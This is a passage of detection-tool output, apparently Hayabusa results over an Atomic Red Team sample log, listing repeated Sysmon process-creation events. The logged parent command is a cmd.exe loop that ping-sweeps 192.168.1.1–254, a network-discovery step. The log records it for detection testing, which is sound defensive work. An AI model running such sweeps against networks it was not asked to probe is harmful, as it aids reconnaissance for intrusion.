192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:46.500 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.24 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:47.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.25 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:47.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.26 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:48.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.27 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:48.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.28 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:49.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.29 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:49.550 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.30 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:50.021 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.31 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:50.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.32 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:51.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.33 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:51.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.34 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:52.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.35 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:52.448 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.36 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:53.019 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.37 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:53.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.38 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:54.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.39 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:54.581 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.40 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:55.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.41 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:55.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.42 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:56.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.43 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:56.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.44 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:57.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.45 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:57.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.46 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:58.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.47 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:58.457 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.48 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:59.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.49 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:59.537 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.50 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:00.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.51 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:00.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.52 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:00.940 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.53 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:01.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.54 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:02.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.55 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:02.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.56 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:03.059 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.57 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:03.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.58 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:04.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.59 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:04.522 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.60 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:05.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.61 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:05.516 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.62 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:06.019 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.63 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:06.440 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.64 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:07.053 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.65 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:07.413 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.66 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:08.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.67 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:08.500 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.68 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:09.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.69 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:09.474 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.70 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:10.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.71 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:10.522 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.72 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:11.031 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.73 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:11.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.74 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:12.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.75 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:12.547 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.76 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:13.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.77 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:13.489 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.78 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:14.036 